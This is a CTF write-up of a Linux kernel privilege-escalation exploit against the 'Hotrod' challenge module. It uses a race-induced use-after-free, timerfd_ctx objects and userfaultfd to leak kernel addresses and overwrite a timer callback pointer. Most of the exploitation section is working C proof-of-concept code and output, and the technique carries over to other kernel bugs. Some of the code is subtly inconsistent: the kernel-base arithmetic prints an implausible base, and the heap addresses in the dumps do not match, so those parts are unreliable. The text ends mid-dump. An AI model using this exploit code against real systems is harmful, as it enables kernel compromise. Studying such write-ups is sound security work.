[CUCTF 2020] Hotrod: Exploiting timerfd_ctx Objects In The Linux Kernel

Hotrod is a kernel exploitation challenge created by my friend FizzBuzz101 for CUCTF 2020. I tested the challenge before it was released and since the exploitation process was very interesting, I decided to write this article. In the next sections we will see how to get a root shell exploiting a UAF, using a single allocation, a timerfd_ctx structure and userfaultfd. Let’s get started!

Information Gathering

Before touching the kernel module, we need to better understand the system itself, gathering as much information as possible. The golden rule is always the same: system analysis first, then code analysis.

We can start by inspecting run_challenge.sh:

#!/bin/sh

qemu-system-x86_64 \
    -s \
    -m 64M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
    -no-reboot \
    -cpu qemu64,+smep \
    -monitor /dev/null \
    -initrd "./initramfs.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1

We can immediately see that various protections are enabled.

– SMEP (Supervisor Mode Execution Prevention):

With SMEP, the CPU will generate a fault if we try to directly execute instructions in user space. This means that even if we are able to control the kernel instruction pointer, we cannot simply map an executable memory region in user space, place our code there and execute it.

Luckily, since SMAP (Supervisor Mode Access Prevention) is disabled, the kernel can still read and write user space memory, so we can build our ROP chain in user space, perform stack pivoting and start executing gadgets. Another approach is to clear bit 20 of the CR4 register to disable SMEP and then directly execute code in user space.
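To make the CR4 approach concrete, here is a minimal user space sketch of the bit arithmetic involved. The helper names and the sample CR4 value used with them are assumptions made for illustration; on a real target the value has to be read from the running system and written back with a kernel gadget.

```c
#include <stdint.h>

/* Bit 20 of CR4 enables SMEP (the kernel headers call it X86_CR4_SMEP). */
#define CR4_SMEP_BIT 20
#define CR4_SMEP     (UINT64_C(1) << CR4_SMEP_BIT)

/* Returns non-zero when the SMEP bit is set in the given CR4 value. */
static int cr4_smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

/* Returns the value a ROP chain would have to write back to CR4
 * in order to disable SMEP while leaving every other bit untouched. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~CR4_SMEP;
}
```

For a hypothetical CR4 value of 0x1006f0, cr4_without_smep() returns 0x6f0: only bit 20 changes.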

– KASLR (Kernel Address Space Layout Randomization):

With this option, every time the system boots up, the location of kernel code in memory is randomized with an entropy of 9 bits. This means that if we want to build a ROP-chain, we will probably need to leak pointers to compute the current kernel base address.

– KPTI (Kernel Page Table Isolation):

KPTI was introduced in the Linux kernel in response to the Meltdown vulnerability. It helps prevent information leaks by separating user space and kernel space page tables. By flipping bit 12 of the CR3 register, the system can switch between two sets of page tables. When the system runs in kernel mode, it uses the first set, so it can access both kernel and user address space (the latter for things like copy_to_user()). In addition, the NX flag is set in the top level of the user portion of the kernel page tables, so any missed kernel-to-user CR3 switch will cause a crash. When the system runs in user mode, it uses the second set, which contains a copy of the user address space and only a limited portion of the kernel address space: the code needed for system calls and the IDT.

uname -a
Linux (none) 5.8.3 #12 Sun August 26 12:00:00 UTC 2020 x86_64 GNU/Linux

The kernel version is very recent, and I couldn’t find any known vulnerability that could be used for privilege escalation.

The QEMU monitor is set to /dev/null: we cannot use the monitor console to interact with QEMU and control the guest OS.

We can proceed to extract symbol addresses and ROP gadgets. Since the System.map file is not provided and we cannot read /proc/kallsyms as an unprivileged user, we need to extract the filesystem and modify the init file to get root privileges.

The filesystem is packed as a cpio archive. We can extract it and replace the uid/gid using the following commands:

mkdir fs && cd fs && cpio -idv < ../initramfs.cpio # Extract the archive
sed -i 's/setuidgid 1000 sh/setuidgid 0 sh/g' init # Replace the user uid/gid
find . | cpio --create --format='newc'  > ../initramfs.cpio # Rebuild the archive

The next step is to disable KASLR, which we can do by modifying the kernel command line options:

sed -i 's/kaslr/nokaslr/g' run_challenge.sh

Finally we can get symbols from /proc/kallsyms.

I also created /bin/info, containing:

#!/bin/sh

HOTROD=$(cat /proc/kallsyms | grep hotrod_ioctl | cut -d " " -f1)
echo [*] Module base: 0x$HOTROD

Then I added /bin/sh /bin/info in the init file, so every time the system boots up I can get the hotrod_ioctl address.

Now we can re-enable KASLR, restore the uid/gid to 1000 and rebuild the cpio archive.

To obtain ROP gadgets, we need to extract the kernel image. We can do this using binwalk to locate the vmlinuz file (the compressed kernel image) inside bzImage:

binwalk bzImage

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
15109         0x3B05          gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00)

Then we can use dd to extract it and gunzip to decompress the archive:

dd if=./bzImage bs=1 skip=15109 of=vmlinux.gz && gunzip vmlinux.gz

Now we can finally extract ROP gadgets using ropper or ROPGadget:

ropper --file ./vmlinux --nocolor > gadgets

PS: We could also have used the extract-vmlinux script to extract the kernel image.

Reverse Engineering

file hotrod.ko
hotrod.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=6bcf4da490ac3e3ab5db8148eb08238250716d32, with debug_info, not stripped

I won’t cover the reverse engineering process (from asm to pseudo C) in detail to avoid unnecessarily lengthening the article. Here is my high-level representation of the module after static analysis:

#define ALLOC 0xBAADC0DE
#define FREE  0xC001C0DE
#define SHOW  0x1337C0DE
#define EDIT  0xDEADC0DE

static DEFINE_MUTEX(hotrod_lock);

static unsigned int allocated, freed, showed, edited;
struct miscdevice hotrod_dev;
struct file_operations hotrod_fops;

hotrod_fops.unlocked_ioctl = hotrod_ioctl;

struct {
    unsigned long size;
    char *content;
} req;


struct {
    unsigned long size;
    char *content;
} hotrod;


int init_hotrod()
{
    mutex_init(&hotrod_lock);

    hotrod_dev.minor = 255; // MISC_DYNAMIC_MINOR
    hotrod_dev.name = "hotrod";
    hotrod_dev.fops = &hotrod_fops;

    if (!misc_register(&hotrod_dev)) {
        printk(KERN_INFO "Hotrod Driver Initialized\n");
        printk(KERN_INFO "Remember, all of the features only work once!\n");
        return 0;
    }

    return -1;
}


int hotrod_ioctl(struct file *file, unsigned int action, unsigned long user_req)
{
    unsigned long allocation_size;

    switch (action) {
        case ALLOC:

            if (!allocated) {
                allocation_size = user_req;
                allocated = 1;

                if (!hotrod.size && !hotrod.content && allocation_size >= 0xe0 && allocation_size <= 0xf0) {
                    hotrod.content = kmalloc(allocation_size, GFP_KERNEL);
                    if (hotrod.content) {
                        hotrod.size = allocation_size;
                        return 0;
                    }
                }
            }

            return -1;

        case FREE:

            if (!freed) {
                freed = 1;

                if (hotrod.size && hotrod.content) {
                    kfree(hotrod.content);
                    hotrod.content = 0;
                    hotrod.size = 0;
                    return 0;
                }
            }

            return -1;

        case SHOW:

            if (!showed && hotrod.size) {
                showed = 1;

                if (hotrod.content) {
                    copy_from_user(&req, user_req, 0x10);
                    if (req.size <= hotrod.size) {
                        copy_to_user(req.content, hotrod.content, req.size);
                        return 0;
                    }
                }
            }

            return -1;

        case EDIT:

            if (!edited && hotrod.size) {
                edited = 1;

                if (hotrod.content) {
                    copy_from_user(&req, user_req, 0x10);
                    if (req.size <= hotrod.size) {
                        copy_from_user(hotrod.content, req.content, req.size);
                        return 0;
                    }
                }
            }

            return -1;
    }
}


void exit_hotrod()
{
    misc_deregister(&hotrod_dev);
    printk(KERN_INFO "Hotrod Driver Removed\n");
}

As we can see, the init_hotrod() function is using misc_register(), an interface that allows kernel modules to register a misc device.

In Linux, each device is identified by a major and a minor number. The major number is used by the kernel to identify the driver associated with the device. The misc driver is identified by the major number 10. The minor number depends on the device and it’s used by the driver to differentiate among various devices.

misc_register() takes as argument a miscdevice structure, in this case hotrod_dev.

We can see that in hotrod_dev, three fields are set:

minor: In this case set to 255, corresponds to MISC_DYNAMIC_MINOR and as we can see from kernel.org: If the minor number is set to MISC_DYNAMIC_MINOR a minor number is assigned and placed in the minor field of the structure.
name: It leaves no room for imagination…
fops: A pointer to the file_operations structure. This structure exposes interfaces needed by users to interact with the device. In this case unlocked_ioctl() is the only exposed function, which we will cover shortly.

After initialization, the device node is created in /dev. Now we can perform I/O operations on it:

ls -la /dev | grep hotrod
crw-rw-rw-    1 root     root       10,  63 Oct  19 09:11 hotrod
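The "10, 63" pair in the listing is the major and minor number of the device node. As a small sketch of how this pair can be checked from user space, the helper below uses the glibc macros from sys/sysmacros.h. The function name and the MISC_MAJOR constant defined here are assumptions for illustration only.

```c
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Major number shared by all devices registered through misc_register(). */
#define MISC_MAJOR 10

/* Returns 1 if the given device number belongs to the misc driver. */
static int is_misc_device(dev_t dev)
{
    return major(dev) == MISC_MAJOR;
}
```

In practice the dev_t value would come from the st_rdev field filled in by stat("/dev/hotrod", ...). The minor number (63 in the listing) is whatever the kernel picked dynamically, so it may differ between boots.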

The hotrod_ioctl() function allows us to perform four different operations: Alloc, Free, Show and Edit. But remember, we can perform each action only once!

The allocation size is limited to between 0xe0 and 0xf0 bytes. To understand what this means, let’s briefly introduce the Slab allocator.

The Slab allocator is used by the Linux kernel to group objects of the same size into caches. Each cache consists of one or more slabs, and each slab is composed of one or more contiguous page frames. Each slab stores a certain number of objects.

There are two classes of caches:

General purpose caches: They are called kmalloc-N, where N is the object size in bytes, usually a power of two: kmalloc-64, kmalloc-128, kmalloc-256 and so on.
Specialized caches: Used for common objects: task_struct, mm_struct, vm_area_struct and so on.

/proc/slabinfo can be used by privileged users to get information about slabs.

The Slab allocator uses a LIFO scheme to perform allocations and deallocations. The kernel will keep track of freed objects in per-cpu freelists and will serve them when a new allocation of the same size takes place.
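The LIFO behavior is what makes it possible to place a victim object in a slot that has just been freed. The following is a toy user space model of that idea, not the real allocator: the pool size, the structure and all function names are assumptions for illustration, and the kernel keeps its freelist inside the freed objects themselves instead of in a separate array.

```c
#include <stddef.h>

#define TOY_OBJECTS  4
#define TOY_OBJ_SIZE 256

/* Toy cache: a fixed pool of objects plus a stack of free slots. */
struct toy_cache {
    unsigned char pool[TOY_OBJECTS][TOY_OBJ_SIZE];
    void *free_stack[TOY_OBJECTS]; /* most recently freed slot is on top */
    size_t free_count;
};

static void toy_cache_init(struct toy_cache *c)
{
    c->free_count = 0;
    /* Push slots in reverse order so the first allocation returns pool[0]. */
    for (size_t i = TOY_OBJECTS; i > 0; i--)
        c->free_stack[c->free_count++] = c->pool[i - 1];
}

/* Pops the most recently freed slot, or returns NULL when the pool is empty. */
static void *toy_alloc(struct toy_cache *c)
{
    if (c->free_count == 0)
        return NULL;
    return c->free_stack[--c->free_count];
}

/* Pushes the slot back on top of the stack, so the next allocation reuses it. */
static void toy_free(struct toy_cache *c, void *obj)
{
    if (c->free_count < TOY_OBJECTS)
        c->free_stack[c->free_count++] = obj;
}
```

Allocating two objects, freeing the first one and allocating again returns the address of the first object. This is the property the exploit relies on.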

Please note that this is just a very basic overview of the Slab allocator. For a detailed explanation, check the articles in References.

At this point we know that allocations in the limited range of 0xe0-0xf0 bytes will end up in kmalloc-256. Let’s proceed to analyze the module source code to spot the bug.
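The mapping from a request size to a general purpose cache can be sketched as a simple lookup. The table below assumes the usual x86_64 size classes (including the non power-of-two kmalloc-96 and kmalloc-192). The table, the upper bound and the function name are assumptions of this sketch, not code taken from the kernel.

```c
#include <stddef.h>

/* Object sizes of the general purpose caches assumed by this sketch. */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Returns the object size of the smallest cache that fits `size` bytes,
 * or 0 when the request is empty or larger than the biggest class here. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

    if (size == 0)
        return 0;

    for (size_t i = 0; i < n; i++) {
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    }
    return 0;
}
```

Both ends of the allowed range, 0xe0 (224) and 0xf0 (240), are larger than 192 and not larger than 256, so every request the module accepts is served from kmalloc-256.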

The Bug

The old ioctl() implementation ran under the Big Kernel Lock. From The new way of ioctl():

ioctl() is one of the remaining parts of the kernel which runs under the Big Kernel Lock (BKL).
In the past, the usage of the BKL has made it possible for long-running ioctl()
methods to create long latencies for unrelated processes.

It was very inefficient in SMP environments, since any other code path that needed the BKL had to wait while an ioctl operation was running. Therefore, two new functions were introduced: unlocked_ioctl() and compat_ioctl(). In kernel version 2.6.36, the old ioctl implementation was completely removed, as we can see from kill .ioctl file_operation.

From The new way of ioctl() we can also understand the difference between the old and the new ioctl() implementation:

If a driver or filesystem provides an unlocked_ioctl() method, it will be called in preference to the older ioctl().
The differences are that the inode argument is not provided (it's available as filp->f_dentry->d_inode)
and the BKL is not taken prior to the call.
All new code should be written with its own locking, and should use unlocked_ioctl().

This is what we were looking for. Hotrod is using unlocked_ioctl() but it does not implement its own locking!

This means that we can use multiple threads to cause a race condition that will result in a Use-After-Free. This, later on, will allow us to get RIP control.

We can formulate the exploitation plan as follows:

We can use Alloc to get an allocation in kmalloc-256 and find a way to get a leak using Show.
Then we can use Edit to modify the allocated object in kernel space. At the same time, with another thread, we can use Free to release the structure and allocate a victim object in the same location (because of freelists LIFO behavior).
At this point the Edit operation will end up overwriting function pointers in the victim object and we will be able to hijack control flow.

To succeed in our plan, we need two elements:

An object allocable in kmalloc-256 that can be used both to get an information leak and to hijack control flow.
A way to make the race condition reliable: we can perform each operation only once, so we need to find a way to maximize the success rate of the race condition.

The Victim Object - timerfd_ctx

As we can see from this useful article, an interesting structure allocated in the kmalloc-256 cache is timerfd_ctx.

struct timerfd_ctx
{
    union
    {
    struct hrtimer tmr;
    struct alarm alarm;
    } t;
    ktime_t tintv;
    ktime_t moffs;
    wait_queue_head_t wqh;
    u64 ticks;
    int clockid;
    short unsigned expired;
    short unsigned settime_flags;   /* to show in fdinfo */
    struct rcu_head rcu;
    struct list_head clist;
    spinlock_t cancel_lock;
    bool might_cancel;
};

The structures in the union are, respectively, an hrtimer structure:

struct hrtimer
{
    struct timerqueue_node node; // timerqueue node, which also manages node.expires
    ktime_t _softexpires; // the absolute earliest expiry time of the hrtimer.
    enum hrtimer_restart (*function)(struct hrtimer *); // timer expiry callback function
    struct hrtimer_clock_base *base; // pointer to the timer base (per cpu and per clock)
    u8 state; // state information (See bit values above)
    u8 is_rel; // Set if the timer was armed relative
    u8 is_soft; // Set if hrtimer will be expired in soft interrupt context.
};

And an alarm structure:

struct alarm
{
    struct timerqueue_node node; // timerqueue node adding to the event list this value also includes the expiration time.
    struct hrtimer timer; // hrtimer used to schedule events while running
    enum alarmtimer_restart (*function)(struct alarm *, ktime_t now); // Function pointer to be executed when the timer fires.
    enum alarmtimer_type type; // Alarm type (BOOTTIME/REALTIME).
    int state; // Flag that represents if the alarm is set to fire or not.
    void *data; // Internal data value.
};

This object is allocated when a timer instance is created by timerfd_create().

timerfd_ctx is a good candidate since it can be used to leak kernel function pointers (to bypass KASLR), kernel heap addresses and to hijack control flow.

It is important to note that the structure is freed using kfree_rcu(). kfree_rcu() will deallocate the object after a grace period to ensure it is no longer used by any thread. We can use sleep(1) after closing the timerfd_ctx file descriptor to make sure it has actually been freed, then we can use Alloc and Show to get an information leak.

To hijack control flow, we can overwrite the function pointer in the hrtimer structure, which points to timerfd_tmrproc(): this function is automatically called by the kernel when the corresponding timer expires.

Here’s timerfd_ctx in memory. We are interested in the highlighted fields:

        0xffff888000297900:  0xffff888000297900 [1]    0x0000000000000000  
        0xffff888000297910:  0x0000000000000000        0x00000002ef81037a [2]             
        0xffff888000297920:  0x00000002ef81037a [3]    0xffffffff81102a00 [4]
        0xffff888000297930:  0xffffffff8183e080        0x0000000000000000      
        0xffff888000297940:  0x0000000000000000        0x0000000000000000      
        0xffff888000297950:  0x0000000000000000        0x0000000000000000      
        0xffff888000297960:  0x0000000000000000        0x0000000000000000      
        0xffff888000297970:  0x0000000000000000        0x0000000000000000      
        0xffff888000297980:  0xbdbbd3bf6c2a6d81        0xffff888000297988      
        0xffff888000297990:  0xffff888000297988        0x0000000000000000      
        0xffff8880002979a0:  0x0000000000000000        0xffff88800013eb00      
        0xffff8880002979b0:  0x00000000000000a8        0x0000000000000000      
        0xffff8880002979c0:  0x0000000000000000        0x0000000000000000      
        0xffff8880002979d0:  0x0000000000000000        0x0000000000000000      
        0xffff8880002979e0:  0x0000000000000000        0x0000000000000000

        [1] Address of current timer node (basically the chunk address)
        [2-3] ktime_t, expiry time of the hrtimer
        [4] timerfd_tmrproc() function pointer
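The annotated fields can be pulled out of a raw dump by indexing it as an array of 64-bit words. The sketch below does exactly that. The offsets come from the dump above, while the structure and function names are assumptions introduced for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Qword indices taken from the annotated dump above. */
enum {
    IDX_NODE        = 0, /* [1] offset 0x00: address of the timer node itself */
    IDX_EXPIRES     = 3, /* [2] offset 0x18: expiry time stored in the node */
    IDX_SOFTEXPIRES = 4, /* [3] offset 0x20: _softexpires */
    IDX_FUNCTION    = 5  /* [4] offset 0x28: timerfd_tmrproc() pointer */
};

struct timerfd_leak {
    uint64_t node;
    uint64_t expires;
    uint64_t softexpires;
    uint64_t function;
};

/* Extracts the interesting fields from the first 0x30 bytes of a dump. */
static struct timerfd_leak parse_timerfd_dump(const unsigned char *dump)
{
    uint64_t q[IDX_FUNCTION + 1];
    struct timerfd_leak out;

    /* memcpy avoids alignment and aliasing problems on a byte buffer. */
    memcpy(q, dump, sizeof(q));

    out.node        = q[IDX_NODE];
    out.expires     = q[IDX_EXPIRES];
    out.softexpires = q[IDX_SOFTEXPIRES];
    out.function    = q[IDX_FUNCTION];
    return out;
}
```

The node field gives a kernel heap address, and the function field gives a kernel text address that can be used against KASLR.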

Optimizing The Race Condition With Userfaultfd

At this point we have the victim object and an exploitation strategy. Now we need to find a way to make the race condition reliable. We will do it by taking advantage of a feature of the Linux kernel: userfaultfd.

userfaultfd allows unprivileged* user space processes to handle page faults and perform other memory management tasks; for example, it can be used to measure page fault latency. But this feature also has a dark side: it can be used to suspend kernel threads.

An attacker can start monitoring a specific memory range, let’s say a page of memory, waiting for page faults. When the kernel tries to access that page, for example with copy_from_user(), it will cause a page fault and control will be transferred to the page fault handler in user space.

This will give the attacker the ability to suspend the kernel thread for an arbitrary amount of time and reliably exploit possible race conditions.

*From kernel 5.11, unprivileged users can by default no longer use userfaultfd to handle page faults raised in kernel mode. FUSE is a good alternative.

Exploitation Plan

Now that we have all the pieces of the puzzle, we can reformulate our plan as follows:

To get a memory leak, we can allocate a timerfd_ctx structure using timerfd_create(), then we can free the object by closing the associated file descriptor.

At this point, we can get an allocation at the same location using Alloc and leak the timerfd_tmrproc() address using Show.
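Once the timerfd_tmrproc() address is known, the KASLR slide is just the difference between the leaked value and the address of the same function in a kernel booted with nokaslr. The sketch below is a simplified way to express this and is not the arithmetic used later in the exploit. The reference address is the one visible in the memory dump, assumed here to have been taken without KASLR, and the helper names are hypothetical.

```c
#include <stdint.h>

/* Address of timerfd_tmrproc() as seen in the dump (assumed to be nokaslr). */
#define TIMERFD_TMRPROC_NOKASLR UINT64_C(0xffffffff81102a00)

/* Returns how far the kernel image has been shifted by KASLR. */
static uint64_t kaslr_slide(uint64_t leaked_tmrproc)
{
    return leaked_tmrproc - TIMERFD_TMRPROC_NOKASLR;
}

/* Rebases an address taken from the nokaslr kernel (symbol or gadget). */
static uint64_t rebase(uint64_t nokaslr_addr, uint64_t slide)
{
    return nokaslr_addr + slide;
}
```

With a hypothetical leak of 0xffffffff9a502a00 the slide is 0x19400000, and every symbol or gadget address extracted from the non-randomized kernel has to be shifted by the same amount.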

To control the kernel instruction pointer, let’s see what happens when we use Edit:

[...]
            if (!edited && hotrod.size) {
                edited = 1;

                if (hotrod.content) {
                    copy_from_user(&req, user_req, 0x10); // [1]
                    if (req.size <= hotrod.size) {
                        copy_from_user(hotrod.content, req.content, req.size); // [2]
                        return 0;
                    }
                }
            }
[...]

The user request is copied to kernel space using copy_from_user() [1]. Then, after a size check, req.size bytes are copied from req.content to the previously allocated memory region using a second copy_from_user() call [2].

This means that if we map a memory region, let’s say a page of memory, and we use it as req.content, userfaultfd can be used to handle the page fault and suspend the kernel thread in the middle of the copy operation.

We first map a page of memory:

void *page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

Then, with another thread, we start monitoring the mapped region using userfaultfd, waiting for a page fault. Now we trigger the copy operation using Edit from the main thread: this will cause a page fault in [2].

At this point control will be transferred to the page fault handler thread and we will be able to suspend the faulting thread. Now, still from the page fault handler thread, we can:

Use Free to deallocate the object.
Allocate a timerfd_ctx structure at the same location (because of freelists LIFO behavior).
Release the faulting thread: the copy operation will overwrite the victim object.

The whole process can be visualized with the following diagram:

                       +
                       |
                       |
            +----------v----------+
            |    create_timer()   |    +------+
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_alloc()     |           +---->  Leak
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_show()      |    +------+
            +----------+----------+
                       |
                       |
            +----------v----------+
            |   pthread_create()  +--------------------------+
            +----------+----------+                          |
                       |                                     |
                       |                          +----------v----------+
                       |                          |    userfaultfd()    |
                       |                          +----------+----------+
                       |                                     |
                       |                                     |
                       |                          +--------->+
                       |                          |          |
                       |                          |          |
                       |                          |   ... polling ...
                       |                          |          |
            +----------v----------+               |          |
            |      do_edit()      |               +----------+
            +----------+----------+                          |
                       |                                     |
                       X                                 PAGE FAULT         +------+
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      do_free()      |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |    create_timer()   |          +--->  Handle PF            
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      ioctl_ufd()    |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                       X                                  RELEASE           +------+
                       |
            +----------v----------+
            | Edit complete (UAF) |
            +---------------------+

The Exploit - Controlling RIP

We can start writing the helper functions to interact with the device.

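#define _GNU_SOURCE
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <linux/userfaultfd.h>

#define DEVICE_PATH "/dev/hotrod"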

#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE

#define PAGE_SIZE 0x1000

static int fd, ufd;
static unsigned long size = 0xf0;
static unsigned char buff[0xf0];
static unsigned long kernel_base, leak, timerfd_ctx, pivot;
static void *page;

struct request
{
    unsigned long size;
    unsigned char *buff;
};


void hexdump(unsigned char *buff, unsigned long size)
{
    int i,j;

    for (i = 0; i < size/8; i++)
    {
        if ((i % 2) == 0)
        {
            if (i != 0)
                printf("  \n");

            printf("  %04x  ", i*8);
        }

        unsigned long ptr = ((unsigned long *)(buff))[i];
        printf("0x%016lx", ptr);
        printf("    ");

    }
    printf("\n");
}


void do_alloc(unsigned long size)
{
    ioctl(fd, ALLOC, size);
}


void do_free(int fd)
{
    ioctl(fd, FREE);
}


void do_show(unsigned char *dest, unsigned long size)
{
    struct request req;

    req.size = size;
    req.buff = dest;

    ioctl(fd, SHOW, &req);
}


void do_edit(unsigned char *src, unsigned long size)
{
    struct request req;

    req.size = size;
    req.buff = src;

    ioctl(fd, EDIT, &req);
}

A timer can be created using:

int create_timer(int leak)
{
    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 10;
    its.it_value.tv_nsec = 0;

    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    timerfd_settime(tfd, 0, &its, 0);

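    if (leak)
    {
        close(tfd);
        sleep(1); // wait for the RCU grace period so the object is actually freed
        return 0;
    }

    return tfd; // keep the timer armed and hand the descriptor back to the caller
}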

Now we need userfaultfd:

int userfaultfd(int flags)
{
    return syscall(SYS_userfaultfd, flags);
}


int initialize_ufd()
{
    int fd;

    puts("[*] Mmapping page...");
    page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);

    struct uffdio_register reg;

    if ((fd = userfaultfd(O_NONBLOCK)) == -1)
    {
        perror("[ERROR] Userfaultfd failed");
        exit(-1);
    }

    struct uffdio_api api = { .api = UFFD_API };

    if (ioctl(fd, UFFDIO_API, &api))
    {
        perror("[ERROR] ioctl - UFFDIO_API failed");
        exit(-1);
    }

    if (api.api != UFFD_API)
    {
        puts("[ERROR] Unexpected UFFD api version!");
        exit(-1);
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    reg.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg.range.start = (long)(page);
    reg.range.len = PAGE_SIZE;

    if (ioctl(fd, UFFDIO_REGISTER,  &reg))
    {
        perror("[ERROR] ioctl - UFFDIO_REGISTER failed");
        exit(-1);
    }

    return fd;
}

And the page fault handler:

void *page_fault_handler(void *_ufd)
{
    struct pollfd pollfd;
    struct uffd_msg fault_msg;
    struct uffdio_copy ufd_copy;

    int ufd = *((int *) _ufd);

    pollfd.fd = ufd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0)
    {

        if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
        {
            perror("[ERROR] Polling failed");
            exit(-1);
        }

        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
        {
            perror("[ERROR] Read - fault_msg failed");
            exit(-1);
        }

        char *page_fault_location = (char *)fault_msg.arg.pagefault.address;

        if (fault_msg.event != UFFD_EVENT_PAGEFAULT || (page_fault_location != page && page_fault_location != page + PAGE_SIZE))
        {
            perror("[ERROR] Unexpected pagefault?");
            exit(-1);
        }

        if (page_fault_location == (void *)0xdead000)
        {
            printf("[+] Page fault at address %p!\n", page_fault_location);

            puts("[*] Freeing...");
            do_free(fd);

            puts("[*] Creating second timer...");
            create_timer(0);

            ((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
            ((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
            ((unsigned long *)(buff))[0x5] = 0x4141414141414141; // [1]

            puts("[*] Structure will be overwritten with: ");
            hexdump(buff, size);

            sleep(1);

            ufd_copy.dst = (unsigned long)0xdead000;
            ufd_copy.src = (unsigned long)(&buff);
            ufd_copy.len = PAGE_SIZE;
            ufd_copy.mode = 0;
            ufd_copy.copy = 0;

            if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
            {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }

            exit(0);
        }
    }

    return NULL;
}

As we can see from [1], with this first POC we should be able to overwrite the kernel RIP with a bunch of "A"s.

int main(void)
{
    pthread_t tid;

    fd = open(DEVICE_PATH, O_RDONLY);

    puts("[*] Allocating/Freeing timerfd_ctx structure...");
    create_timer(1);

    puts("[*] Leaking timerfd_tmrproc address...");
    do_alloc(size);
    do_show(buff, size);

    puts("[+] Object dump: ");
    hexdump(buff, size);

    leak = ((unsigned long *)(buff))[0x5];
    timerfd_ctx = ((unsigned long *)(buff))[0];
    kernel_base = leak - 0x81102a00UL + 0x100000000UL;

    printf("[+] Leaked timerfd_ctx structure address: 0x%lx\n", timerfd_ctx);
    printf("[+] Leaked timerfd_tmrproc address: 0x%lx\n", leak);
    printf("[+] Kernel base address: 0x%lx\n", (0xffffffff00000000UL + kernel_base));

    int ufd = initialize_ufd();
    pthread_create(&tid, NULL, page_fault_handler, &ufd);

    puts("[*] Triggering page fault...");
    do_edit(page, size);

    pthread_join(tid, NULL);

}

Here’s the complete POC code: poc.c

We can compile and run the exploit:

gcc -o poc poc.c -static -s -lpthread

    / $ /home/user/poc
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
    0000  0xffff88800029bf00    0x0000000000000000      
    0010  0x0000000000000000    0x00000002e3f48042      
    0020  0x00000002e3f48042    0xffffffff81102a00      
    0030  0xffffffff8183e080    0x0000000000000000      
    0040  0x0000000000000000    0x0000000000000000      
    0050  0x0000000000000000    0x0000000000000000      
    0060  0x0000000000000000    0x0000000000000000      
    0070  0x0000000000000000    0x0000000000000000      
    0080  0xbd7dd3bf6c2aa381    0xffff88800029bf88      
    0090  0xffff88800029bf88    0x0000000000000000      
    00a0  0x0000000000000000    0xffff88800015ad00      
    00b0  0x00000000000000a8    0x0000000000000000      
    00c0  0x0000000000000000    0x0000000000000000      
    00d0  0x0000000000000000    0x0000000000000000      
    00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029bf00
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xfffffffd00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
    0000  0xffff88800029b900    0x0000000000000000      
    0010  0x0000000000000000    0x000000000eae0e65      
    0020  0x000000000eae0e65    0x4141414141414141 <- timerfd_tmrproc [1]      
    0030  0xffffffff8183e080    0x0000000000000000      
    0040  0x0000000000000000    0x0000000000000000      
    0050  0x0000000000000000    0x0000000000000000      
    0060  0x0000000000000000    0x0000000000000000      
    0070  0x0000000000000000    0x0000000000000000      
    0080  0xbd7bd3bf6c2aa481    0xffff88800029b988      
    0090  0xffff88800029b988    0x0000000000000000      
    00a0  0x0000000000000000    0xffff88800013f800      
    00b0  0x00000000000000a8    0x0000000000000000      
    00c0  0x0000000000000000    0x0000000000000000      
    00d0  0x0000000000000000    0x0000000000000000      
